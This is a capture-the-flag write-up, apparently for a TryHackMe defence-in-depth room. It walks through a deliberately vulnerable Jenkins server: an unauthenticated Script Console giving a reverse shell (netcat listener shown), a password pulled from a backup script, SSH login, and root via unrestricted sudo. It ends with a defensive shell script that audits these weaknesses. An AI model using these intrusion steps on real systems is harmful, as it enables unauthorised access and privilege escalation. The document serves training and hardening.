Day 12

Defence in Depth: Sleighing Threats, One Layer at a Time

Learning Objectives

  • Defence in Depth

  • Basic Endpoint Hardening

  • Simple Boot2Root Methodology

We are dealing with a server that is vulnerable by design. It contains misconfigurations and has been implemented with poor or simply nonexistent security practices.

Jenkins Dashboard without authentication
Access to the Script Console allowing RCE and hence a reverse shell
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 6996
listening on [any] 6996 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.63.220] 52726
whoami
jenkins

Successful reverse shell

┌──(kali㉿kali)-[~]
└─$ ssh tracy@10.10.63.220
tracy@10.10.63.220's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Dec 13 05:20:26 AM UTC 2023

  System load:  0.00537109375     Processes:             114
  Usage of /:   48.0% of 9.75GB   Users logged in:       1
  Memory usage: 37%               IPv4 address for eth0: 10.10.63.220
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

41 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Nov 22 19:59:37 2023 from 10.18.65.106
tracy@jenkins:~$ sudo -l
[sudo] password for tracy: 
Matching Defaults entries for tracy on jenkins:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User tracy may run the following commands on jenkins:
    (ALL : ALL) ALL
    
tracy@jenkins:~$ sudo su
root@jenkins:/home/tracy# 

The (ALL : ALL) ALL line in the output means that tracy may run any command, as any user and any group, through sudo. In other words, the account was created with inherently privileged access, so a plain sudo su is enough to become root.

Jenkins after fixing config file.
What is the default port for Jenkins?
[REDACTED]
What is the password of the user tracy?
[REDACTED]
Can be found in a backup file.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 6996
listening on [any] 6996 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.63.220] 52726
whoami
jenkins
cd /opt/scripts
ls
backup.sh
cat backup.sh
#!/bin/sh
.
.
.
tar czvf /var/lib/jenkins/backup.tar.gz /var/lib/jenkins/backup/
/bin/sleep 5

username=[REDACTED]
password=[REDACTED]
What's the root flag?
[REDACTED]
Can be found when we get root access using tracy's password.

root@jenkins:/# cd root
root@jenkins:~# ls
[REDACTED]  snap
root@jenkins:~# cat flag.txt
[REDACTED]
What is the error message when you login as tracy again and try sudo -l after its removal from the sudoers group?
Sorry, user tracy may not run sudo on jenkins.
What's the SSH flag?
[REDACTED]
Can be found in the SSH config file.
What's the Jenkins flag?
[REDACTED]
Can be found in the backup config file.
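As an added example (not part of this write-up or the TryHackMe room), the POSIX shell script below audits the three weaknesses walked through above from the defender's side: a user left in the sudo group, plaintext credentials in /opt/scripts/backup.sh, and a Jenkins config.xml with authentication switched off. The /var/lib/jenkins/config.xml path, the useSecurity element check and the grep patterns are assumptions; make_samples builds constructed weak and fixed files so the checks can be run offline.

```shell
#!/bin/sh
# Added hardening audit (example code, not from the write-up or the room).
# Checks return 0 when the fix is in place, 1 when the weakness found in the
# walkthrough is still present; paths are parameters so they run on samples too.

# Is USER a member of the sudo group in an /etc/group-style FILE?
check_sudo_group() {  # usage: check_sudo_group FILE USER
    members=$(awk -F: '$1=="sudo"{print $4}' "$1" 2>/dev/null)
    case ",$members," in
        *",$2,"*) return 1 ;;   # still in the sudo group: weak
        *)        return 0 ;;
    esac
}

# Does a script FILE carry plaintext username=/password= assignments?
check_script_secrets() {  # usage: check_script_secrets FILE
    ! grep -Eiq '^[[:space:]]*(username|password)[[:space:]]*=' "$1"
}

# Is authentication switched on in a Jenkins config.xml FILE? (assumed element)
check_jenkins_security() {  # usage: check_jenkins_security FILE
    grep -Eq '<useSecurity>[[:space:]]*true[[:space:]]*</useSecurity>' "$1" 2>/dev/null
}

# Run one check, print PASS/FAIL with LABEL, and pass its status through.
report() {  # usage: report LABEL CHECK ARGS...
    label=$1; shift
    if "$@"; then echo "PASS $label"; else echo "FAIL $label"; return 1; fi
}

# Audit a host (defaults match the box in the write-up); returns 1 if any check fails.
audit_host() {  # usage: audit_host [USER] [GROUP_FILE] [BACKUP_SCRIPT] [JENKINS_CONFIG]
    rc=0
    report "sudo group membership"  check_sudo_group "${2:-/etc/group}" "${1:-tracy}" || rc=1
    report "plaintext backup creds" check_script_secrets "${3:-/opt/scripts/backup.sh}" || rc=1
    report "jenkins useSecurity"    check_jenkins_security "${4:-/var/lib/jenkins/config.xml}" || rc=1
    return $rc
}

# Constructed sample files (weak and fixed variants) for an offline dry run; prints the dir.
make_samples() {
    d=$(mktemp -d)
    printf 'root:x:0:\nsudo:x:27:tracy\n' > "$d/group.weak"
    printf 'root:x:0:\nsudo:x:27:\n'      > "$d/group.fixed"
    printf '#!/bin/sh\ntar czvf /tmp/b.tgz /tmp/b/\nusername=EXAMPLE\npassword=EXAMPLE\n' > "$d/backup.weak"
    printf '#!/bin/sh\ntar czvf /tmp/b.tgz /tmp/b/\n' > "$d/backup.fixed"
    printf '<hudson>\n  <useSecurity>false</useSecurity>\n</hudson>\n' > "$d/config.weak"
    printf '<hudson>\n  <useSecurity>true</useSecurity>\n</hudson>\n'  > "$d/config.fixed"
    printf '%s\n' "$d"
}
```

Running audit_host with no arguments on the box itself reports each item as PASS or FAIL; pointing it at the make_samples directory shows the weak set failing every check and the fixed set passing.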
